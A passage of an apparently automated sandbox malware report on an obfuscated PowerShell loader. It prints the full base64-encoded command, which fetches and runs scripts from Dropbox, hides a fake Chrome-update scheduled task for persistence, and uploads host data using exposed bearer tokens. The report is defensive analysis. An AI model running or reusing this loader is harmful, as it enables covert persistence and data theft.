Z2dlciAkdHJpZ2dlciAtU2V0dGluZ3MgJHNldHRpbmdzOyAgJGFhYSA9IEpvaW4tUGF0aCAoJGVudjpBcHBEYXRhKSAic3lzdGVtX2ZpcnN0LnBzMSI7IHdnZXQgLVVyaSAiaHR
                Sigma detected: Change PowerShell Policies to an Insecure Level
                Source: Process startedAuthor: frack113: Data: Command: powershell /W 1 -ep bypass -w hidden -command $cmkGnaBV=[Convert]::FromBase64String('JHBwcCA9IEpvaW4tUGF0aCAoJGVudjpBcHBEYXRhKSAiY2hyb21lLnBzMSI7ICRzdHIgPSAnJGFhYSA9IEpvaW4tUGF0aCAoJGVudjpBcHBEYXRhKSAidGVtcC5wczEiOyB3Z2V0IC1VcmkgImh0dHBzOi8vZGwuZHJvcGJveHVzZXJjb250ZW50LmNvbS9zY2wvZmkvZGt1YW1scmxzcmJ5Z3NvMXN3bjhwL3NhbnRhMi1mLnR4dD9ybGtleT1yOGZlMHZpaWVyMW13djlhems1YXd5NXM5JnN0PXl2cXFmZGZ5JmRsPTAiIC1PdXRGaWxlICRhYWE7ICYgJGFhYTsgUmVtb3ZlLUl0ZW0gLVBhdGggJGFhYSAtRm9yY2U7JzsgJHN0ciB8IE91dC1GaWxlIC1GaWxlUGF0aCAkcHBwIC1FbmNvZGluZyBVVEY4OyAkYWN0aW9uID0gTmV3LVNjaGVkdWxlZFRhc2tBY3Rpb24gLUV4ZWN1dGUgJ1Bvd2VyU2hlbGwuZXhlJyAtQXJndW1lbnQgJy1XaW5kb3dTdHlsZSBIaWRkZW4gLW5vcCAgLU5vbkludGVyYWN0aXZlIC1Ob1Byb2ZpbGUgLUV4ZWN1dGlvblBvbGljeSBCeXBhc3MgLUNvbW1hbmQgIiYgeyRhYmMgPSBKb2luLVBhdGggKCRlbnY6QXBwRGF0YSkgXCJjaHJvbWUucHMxXCI7ICYgJGFiYzt9Iic7ICR0cmlnZ2VyID0gTmV3LVNjaGVkdWxlZFRhc2tUcmlnZ2VyIC1PbmNlIC1BdCAoR2V0LURhdGUpLkFkZE1pbnV0ZXMoNSkgLVJlcGV0aXRpb25JbnRlcnZhbCAoTmV3LVRpbWVTcGFuIC1NaW51dGVzIDMwKTsgJHNldHRpbmdzID0gTmV3LVNjaGVkdWxlZFRhc2tTZXR0aW5nc1NldCAtSGlkZGVuOyBSZWdpc3Rlci1TY2hlZHVsZWRUYXNrIC1UYXNrTmFtZSAiQ2hyb21lVXBkYXRlVGFza01hY2hpbmUiIC1BY3Rpb24gJGFjdGlvbiAtVHJpZ2dlciAkdHJpZ2dlciAtU2V0dGluZ3MgJHNldHRpbmdzOyAgJGFhYSA9IEpvaW4tUGF0aCAoJGVudjpBcHBEYXRhKSAic3lzdGVtX2ZpcnN0LnBzMSI7IHdnZXQgLVVyaSAiaHR0cHM6Ly9kbC5kcm9wYm94dXNlcmNvbnRlbnQuY29tL3NjbC9maS9nN21jc2hreDNxbW81bXZ5dGYyY3Qvc2FudGEyLXgudHh0P3Jsa2V5PTVuYmJxZWdjNWE3N3I3NmhpeW02czl5Mmgmc3Q9NzI3Y3MxbXgmZGw9MCIgLU91dEZpbGUgJGFhYTsgJiAkYWFhOyBSZW1vdmUtSXRlbSAtUGF0aCAkYWFhIC1Gb3JjZTs=');$U9zBwFeD = [System.Text.Encoding]::UTF8.GetString($cmkGnaBV);&('{5}{0}{2}{1}{3}{4}{6}'-f 'oke','xp','-E','res','sio','Inv','n') $U9zBwFeD, CommandLine: powershell /W 1 -ep bypass -w hidden -command $cmkGnaBV=[Convert]::FromBase64String('JHBwcCA9IEpvaW4tUGF0aCAoJGVudjpBcHBEYXRhKSAiY2hyb21lLnBzMSI7ICRzdHIgPSAnJGFhYSA9IEpvaW4tUGF0aCAoJGVudjpBcHBEYXRhKSAidGVtcC5wczEiOyB3Z2V0IC1VcmkgImh0dHBzOi8vZGwuZHJvcGJveHVzZXJjb250ZW50LmNvbS9zY2wvZmkvZGt1YW1scmxzcmJ5Z3NvMXN3bjhwL3NhbnRhMi1mLnR4dD9ybGtleT1yOGZlMHZpaWVyMW13djlhems1YXd5NXM5JnN0PXl2cXFmZGZ5JmRsPTAiIC1PdXRGaWxlICRhYWE7ICYgJGFhYTsgUmVtb3ZlLUl0ZW0gLVBhdGggJGFhYSAtRm9yY2U7JzsgJHN0ciB8IE91dC1GaWxlIC1GaWxlUGF0aCAkcHBwIC1FbmNvZGluZyBVVEY4OyAkYWN0aW9uID0gTmV3LVNjaGVkdWxlZFRhc2tBY3Rpb24gLUV4ZWN1dGUgJ1Bvd2VyU2hlbGwuZXhlJyAtQXJndW1lbnQgJy1XaW5kb3dTdHlsZSBIaWRkZW4gLW5vcCAgLU5vbkludGVyYWN0aXZlIC1Ob1Byb2ZpbGUgLUV4ZWN1dGlvblBvbGljeSBCeXBhc3MgLUNvbW1hbmQgIiYgeyRhYmMgPSBKb2luLVBhdGggKCRlbnY6QXBwRGF0YSkgXCJjaHJvbWUucHMxXCI7ICYgJGFiYzt9Iic7ICR0cmlnZ2VyID0gTmV3LVNjaGVkdWxlZFRhc2tUcmlnZ2VyIC1PbmNlIC1BdCAoR2V0LURhdGUpLkFkZE1pbnV0ZXMoNSkgLVJlcGV0aXRpb25JbnRlcnZhbCAoTmV3LVRpbWVTcGFuIC1NaW51dGVzIDMwKTsgJHNldHRpbmdzID0gTmV3LVNjaGVkdWxlZFRhc2tTZXR0aW5nc1NldCAtSGlkZGVuOyBSZWdpc3Rlci1TY2hlZHVsZWRUYXNrIC1UYXNrTmFtZSAiQ2hyb21lVXBkYXRlVGFza01hY2hpbmUiIC1BY3Rpb24gJGFjdGlvbiAtVHJpZ2dlciAkdHJpZ2dlciAtU2V0dGluZ3MgJHNldHRpbmdzOyAgJGFhYSA9IEpvaW4tUGF0aCAoJGVudjpBcHBEYXRhKSAic3lzdGVtX2ZpcnN0LnBzMSI7IHdnZXQgLVVyaSAiaHR
                Sigma detected: Non Interactive PowerShell Process Spawned
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell /W 1 -ep bypass -w hidden -command $cmkGnaBV=[Convert]::FromBase64String('JHBwcCA9IEpvaW4tUGF0aCAoJGVudjpBcHBEYXRhKSAiY2hyb21lLnBzMSI7ICRzdHIgPSAnJGFhYSA9IEpvaW4tUGF0aCAoJGVudjpBcHBEYXRhKSAidGVtcC5wczEiOyB3Z2V0IC1VcmkgImh0dHBzOi8vZGwuZHJvcGJveHVzZXJjb250ZW50LmNvbS9zY2wvZmkvZGt1YW1scmxzcmJ5Z3NvMXN3bjhwL3NhbnRhMi1mLnR4dD9ybGtleT1yOGZlMHZpaWVyMW13djlhems1YXd5NXM5JnN0PXl2cXFmZGZ5JmRsPTAiIC1PdXRGaWxlICRhYWE7ICYgJGFhYTsgUmVtb3ZlLUl0ZW0gLVBhdGggJGFhYSAtRm9yY2U7JzsgJHN0ciB8IE91dC1GaWxlIC1GaWxlUGF0aCAkcHBwIC1FbmNvZGluZyBVVEY4OyAkYWN0aW9uID0gTmV3LVNjaGVkdWxlZFRhc2tBY3Rpb24gLUV4ZWN1dGUgJ1Bvd2VyU2hlbGwuZXhlJyAtQXJndW1lbnQgJy1XaW5kb3dTdHlsZSBIaWRkZW4gLW5vcCAgLU5vbkludGVyYWN0aXZlIC1Ob1Byb2ZpbGUgLUV4ZWN1dGlvblBvbGljeSBCeXBhc3MgLUNvbW1hbmQgIiYgeyRhYmMgPSBKb2luLVBhdGggKCRlbnY6QXBwRGF0YSkgXCJjaHJvbWUucHMxXCI7ICYgJGFiYzt9Iic7ICR0cmlnZ2VyID0gTmV3LVNjaGVkdWxlZFRhc2tUcmlnZ2VyIC1PbmNlIC1BdCAoR2V0LURhdGUpLkFkZE1pbnV0ZXMoNSkgLVJlcGV0aXRpb25JbnRlcnZhbCAoTmV3LVRpbWVTcGFuIC1NaW51dGVzIDMwKTsgJHNldHRpbmdzID0gTmV3LVNjaGVkdWxlZFRhc2tTZXR0aW5nc1NldCAtSGlkZGVuOyBSZWdpc3Rlci1TY2hlZHVsZWRUYXNrIC1UYXNrTmFtZSAiQ2hyb21lVXBkYXRlVGFza01hY2hpbmUiIC1BY3Rpb24gJGFjdGlvbiAtVHJpZ2dlciAkdHJpZ2dlciAtU2V0dGluZ3MgJHNldHRpbmdzOyAgJGFhYSA9IEpvaW4tUGF0aCAoJGVudjpBcHBEYXRhKSAic3lzdGVtX2ZpcnN0LnBzMSI7IHdnZXQgLVVyaSAiaHR0cHM6Ly9kbC5kcm9wYm94dXNlcmNvbnRlbnQuY29tL3NjbC9maS9nN21jc2hreDNxbW81bXZ5dGYyY3Qvc2FudGEyLXgudHh0P3Jsa2V5PTVuYmJxZWdjNWE3N3I3NmhpeW02czl5Mmgmc3Q9NzI3Y3MxbXgmZGw9MCIgLU91dEZpbGUgJGFhYTsgJiAkYWFhOyBSZW1vdmUtSXRlbSAtUGF0aCAkYWFhIC1Gb3JjZTs=');$U9zBwFeD = [System.Text.Encoding]::UTF8.GetString($cmkGnaBV);&('{5}{0}{2}{1}{3}{4}{6}'-f 'oke','xp','-E','res','sio','Inv','n') $U9zBwFeD, CommandLine: powershell /W 1 -ep bypass -w hidden -command $cmkGnaBV=[Convert]::FromBase64String('JHBwcCA9IEpvaW4tUGF0aCAoJGVudjpBcHBEYXRhKSAiY2hyb21lLnBzMSI7ICRzdHIgPSAnJGFhYSA9IEpvaW4tUGF0aCAoJGVudjpBcHBEYXRhKSAidGVtcC5wczEiOyB3Z2V0IC1VcmkgImh0dHBzOi8vZGwuZHJvcGJveHVzZXJjb250ZW50LmNvbS9zY2wvZmkvZGt1YW1scmxzcmJ5Z3NvMXN3bjhwL3NhbnRhMi1mLnR4dD9ybGtleT1yOGZlMHZpaWVyMW13djlhems1YXd5NXM5JnN0PXl2cXFmZGZ5JmRsPTAiIC1PdXRGaWxlICRhYWE7ICYgJGFhYTsgUmVtb3ZlLUl0ZW0gLVBhdGggJGFhYSAtRm9yY2U7JzsgJHN0ciB8IE91dC1GaWxlIC1GaWxlUGF0aCAkcHBwIC1FbmNvZGluZyBVVEY4OyAkYWN0aW9uID0gTmV3LVNjaGVkdWxlZFRhc2tBY3Rpb24gLUV4ZWN1dGUgJ1Bvd2VyU2hlbGwuZXhlJyAtQXJndW1lbnQgJy1XaW5kb3dTdHlsZSBIaWRkZW4gLW5vcCAgLU5vbkludGVyYWN0aXZlIC1Ob1Byb2ZpbGUgLUV4ZWN1dGlvblBvbGljeSBCeXBhc3MgLUNvbW1hbmQgIiYgeyRhYmMgPSBKb2luLVBhdGggKCRlbnY6QXBwRGF0YSkgXCJjaHJvbWUucHMxXCI7ICYgJGFiYzt9Iic7ICR0cmlnZ2VyID0gTmV3LVNjaGVkdWxlZFRhc2tUcmlnZ2VyIC1PbmNlIC1BdCAoR2V0LURhdGUpLkFkZE1pbnV0ZXMoNSkgLVJlcGV0aXRpb25JbnRlcnZhbCAoTmV3LVRpbWVTcGFuIC1NaW51dGVzIDMwKTsgJHNldHRpbmdzID0gTmV3LVNjaGVkdWxlZFRhc2tTZXR0aW5nc1NldCAtSGlkZGVuOyBSZWdpc3Rlci1TY2hlZHVsZWRUYXNrIC1UYXNrTmFtZSAiQ2hyb21lVXBkYXRlVGFza01hY2hpbmUiIC1BY3Rpb24gJGFjdGlvbiAtVHJpZ2dlciAkdHJpZ2dlciAtU2V0dGluZ3MgJHNldHRpbmdzOyAgJGFhYSA9IEpvaW4tUGF0aCAoJGVudjpBcHBEYXRhKSAic3lzdGVtX2ZpcnN0LnBzMSI7IHdnZXQgLVVyaSAiaHR
                Sigma detected: PowerShell Script Dropped Via PowerShell.EXE
                Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 2124, TargetFilename: C:\Users\user\AppData\Roaming\chrome.ps1

                Suricata Signatures

                No Suricata rule has matched

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 96.9% probability
                Source: unknownHTTPS traffic detected: 162.125.65.15:443 -> 192.168.2.4:49730 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 162.125.65.15:443 -> 192.168.2.4:49731 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 162.125.69.19:443 -> 192.168.2.4:49732 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 162.125.69.19:443 -> 192.168.2.4:49733 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 162.125.69.14:443 -> 192.168.2.4:49734 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 162.125.69.14:443 -> 192.168.2.4:49735 version: TLS 1.2
                Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                Source: global trafficHTTP traffic detected: GET /scl/fi/g7mcshkx3qmo5mvytf2ct/santa2-x.txt?rlkey=5nbbqegc5a77r76hiym6s9y2h&st=727cs1mx&dl=0 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: dl.dropboxusercontent.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /scl/fi/dkuamlrlsrbygso1swn8p/santa2-f.txt?rlkey=r8fe0viier1mwv9azk5awy5s9&st=yvqqfdfy&dl=0 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: dl.dropboxusercontent.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: POST /oauth2/token HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Content-Type: application/x-www-form-urlencodedHost: api.dropboxapi.comContent-Length: 159Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: POST /oauth2/token HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Content-Type: application/x-www-form-urlencodedHost: api.dropboxapi.comContent-Length: 159Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: POST /2/files/upload HTTP/1.1Authorization: Bearer sl.CBdrhtA2i7MANIpw6LV05cpSOoLdv8LvnoY9VkGFg7YlBb77gQrMcsF9m55TbOafoVTv8naCjUbVwtxc7jbXouTeU3K8hEtj7vBXfWB6bmcCs5gyarAD9QQM0bx36J2Y8K03Pn-kn6rSDropbox-API-Arg: { "path": "/githut/santa2_persist/192.168.2.4-1127_0234-XXX-santa2.txt", "mode": "add", "autorename": true, "mute": false }Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: content.dropboxapi.comContent-Length: 14Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: POST /2/files/upload HTTP/1.1Authorization: Bearer sl.CBfm4jbAe6PaEM-X_WB0ay6vHknEpcftuCwu5RojrJUCQFGTL3H7Gnsupuxw0VS463sn_cG04wz7qMrHOVtsyBN_yRsfUnu8I2BRnyt7Wq8AnR-QIfaXepPMuo1Nk50hWk585bbxJvJgDropbox-API-Arg: { "path": "/github/santa2_first/192.168.2.4-1127_0234-RRR-santa2.txt", "mode": "add", "autorename": true, "mute": false }Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: content.dropboxapi.comContent-Length: 49412Connection: Keep-Alive
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /scl/fi/g7mcshkx3qmo5mvytf2ct/santa2-x.txt?rlkey=5nbbqegc5a77r76hiym6s9y2h&st=727cs1mx&dl=0 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: dl.dropboxusercontent.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /scl/fi/dkuamlrlsrbygso1swn8p/santa2-f.txt?rlkey=r8fe0viier1mwv9azk5awy5s9&st=yvqqfdfy&dl=0 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: dl.dropboxusercontent.comConnection: Keep-Alive
                Source: global trafficDNS traffic detected: DNS query: dl.dropboxusercontent.com
                Source: global trafficDNS traffic detected: DNS query: api.dropboxapi.com
                Source: global trafficDNS traffic detected: DNS query: content.dropboxapi.com
                Source: unknownHTTP traffic detected: POST /oauth2/token HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Content-Type: application/x-www-form-urlencodedHost: api.dropboxapi.comContent-Length: 159Connection: Keep-Alive
                Source: powershell.exe, 00000002.00000002.1821493344.000002C3DB033000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api-env.dropbox-dns.com
                Source: powershell.exe, 00000002.00000002.1821493344.000002C3DB033000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.dropboxapi.com
                Source: powershell.exe, 00000002.00000002.1821493344.000002C3DB09F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1836552794.0000019FBD3EA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://content.dropboxapi.com
                Source: powershell.exe, 00000003.00000002.1968058446.0000019FD31A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoftz8
                Source: powershell.exe, 00000002.00000002.1821493344.000002C3DAEFE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://dl.dropboxusercontent.com
                Source: powershell.exe, 00000002.00000002.1821493344.000002C3DB09F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1836552794.0000019FBD3EA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edge-block-api-env.dropbox-dns.com
                Source: powershell.exe, 00000002.00000002.1821493344.000002C3DAEFE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edge-block-www-env.dropbox-dns.com
                Source: powershell.exe, 00000002.00000002.1844637093.000002C3E9B32000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1957253822.0000019FCAEB3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1957253822.0000019FCB037000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                Source: powershell.exe, 00000003.00000002.1836552794.0000019FBB061000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                Source: powershell.exe, 00000002.00000002.1821493344.000002C3D9CEA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                Source: powershell.exe, 00000002.00000002.1821493344.000002C3D9AC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1836552794.0000019FBAE41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: powershell.exe, 00000002.00000002.1821493344.000002C3D9CEA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                Source: powershell.exe, 00000003.00000002.1836552794.0000019FBB061000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                Source: powershell.exe, 00000002.00000002.1821493344.000002C3D9AC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1836552794.0000019FBAE41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                Source: powershell.exe, 00000002.00000002.1821493344.000002C3D9CEA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1821493344.000002C3DB83E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1821493344.000002C3DB9E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
                Source: powershell.exe, 00000002.00000002.1821493344.000002C3DBA0B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1821493344.000002C3DB9E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelpX
                Source: powershell.exe, 00000002.00000002.1821493344.000002C3DAF78000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.drH
                Source: powershell.exe, 00000002.00000002.1821493344.000002C3DAF78000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.dropboxap
                Source: powershell.exe, 00000002.00000002.1821493344.000002C3DAF78000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1836552794.0000019FBB23A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.dropboxapi.com
                Source: powershell.exe, 00000002.00000002.1821493344.000002C3DAF78000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.dropboxapi.com/oaup
                Source: powershell.exe, 00000002.00000002.1821493344.000002C3DB033000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1836552794.0000019FBB23A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.dropboxapi.com/oauth2/token
                Source: powershell.exe, 00000002.00000002.1821493344.000002C3DAF78000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.dropboxapi.com/oauth2/tokenp
                Source: powershell.exe, 00000002.00000002.1821493344.000002C3DAF78000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.dropboxapi.com/oauth2/top
                Source: powershell.exe, 00000003.00000002.1836552794.0000019FBB23A000.00000004.00000800.00020000.00000000.sdmp, system_first.ps1.2.dr, temp.ps1.3.drString found in binary or memory: https://content.drop
                Source: powershell.exe, 00000002.00000002.1821493344.000002C3DAF78000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://content.dropboxaH
                Source: powershell.exe, 00000002.00000002.1821493344.000002C3DB09F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1836552794.0000019FBD3EA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://content.dropboxapi.com
                Source: powershell.exe, 00000002.00000002.1821493344.000002C3DB281000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1836552794.0000019FBDBEF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1836552794.0000019FBB23A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://content.dropboxapi.com/2/files/upload
                Source: powershell.exe, 00000002.00000002.1821493344.000002C3DAF78000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://content.dropboxapi.com/2/files/uploadp
                Source: powershell.exe, 00000002.00000002.1821493344.000002C3DAF78000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://content.dropboxapi.com/2/files/uplop
                Source: powershell.exe, 00000002.00000002.1821493344.000002C3DAF78000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://content.dropboxapi.com/2/fp
                Source: powershell.exe, 00000003.00000002.1957253822.0000019FCB037000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                Source: powershell.exe, 00000003.00000002.1957253822.0000019FCB037000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                Source: powershell.exe, 00000003.00000002.1957253822.0000019FCB037000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                Source: powershell.exe, 00000002.00000002.1821493344.000002C3DAEBE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1836552794.0000019FBB061000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dl.dropboxusercontent.com
                Source: powershell.exe, 00000002.00000002.1821493344.000002C3DAD5D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dl.dropboxusercontent.com/
                Source: powershell.exe, 00000003.00000002.1836552794.0000019FBB061000.00000004.00000800.00020000.00000000.sdmp, chrome.ps1.2.drString found in binary or memory: https://dl.dropboxusercontent.com/scl/fi/dkuamlrlsrbygso1swn8p/santa2-f.txt?rlkey=r8fe0viier1mwv9azk
                Source: powershell.exe, 00000002.00000002.1821493344.000002C3DADD6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dl.dropboxusercontent.com/scl/fi/g7mcsh
                Source: powershell.exe, 00000002.00000002.1821493344.000002C3DAE08000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dl.dropboxusercontent.com/scl/fi/g7mcshkx3qmo5mvytf2ct/santa2-x.txt?rlkey=5nbbqegc5a
                Source: powershell.exe, 00000002.00000002.1821493344.000002C3DA8D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dl.dropboxusercontent.com/scl/fi/g7mcshkx3qmo5mvytf2ct/santa2-x.txt?rlkey=5nbbqegc5a77r76hiy
                Source: powershell.exe, 00000002.00000002.1821493344.000002C3DAF45000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dropboxusercontent.com/
                Source: powershell.exe, 00000003.00000002.1836552794.0000019FBB061000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                Source: powershell.exe, 00000002.00000002.1844637093.000002C3E9B32000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1957253822.0000019FCAEB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                Source: powershell.exe, 00000002.00000002.1821493344.000002C3DAF1B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1821493344.000002C3DAEFE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1836552794.0000019FBB21A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1836552794.0000019FBB227000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/csp_log?policy_name=blockserver-noscript
                Source: powershell.exe, 00000002.00000002.1821493344.000002C3DAF1B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1821493344.000002C3DAEFE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1836552794.0000019FBB21A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1836552794.0000019FBB227000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/csp_log?policy_name=blockserver-usercontent
                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
                Source: unknownHTTPS traffic detected: 162.125.65.15:443 -> 192.168.2.4:49730 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 162.125.65.15:443 -> 192.168.2.4:49731 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 162.125.69.19:443 -> 192.168.2.4:49732 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 162.125.69.19:443 -> 192.168.2.4:49733 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 162.125.69.14:443 -> 192.168.2.4:49734 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 162.125.69.14:443 -> 192.168.2.4:49735 version: TLS 1.2

                System Summary

                barindex
                Malicious sample detected (through community Yara rule)
                Source: Process Memory Space: powershell.exe PID: 2124, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD9B79FAB92_2_00007FFD9B79FAB9
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD9B7A91D52_2_00007FFD9B7A91D5
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD9B7A914C2_2_00007FFD9B7A914C
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD9B79F8A82_2_00007FFD9B79F8A8
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD9B7A7FD32_2_00007FFD9B7A7FD3
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD9B79247B2_2_00007FFD9B79247B
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD9B7763983_2_00007FFD9B776398
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD9B7763B83_2_00007FFD9B7763B8
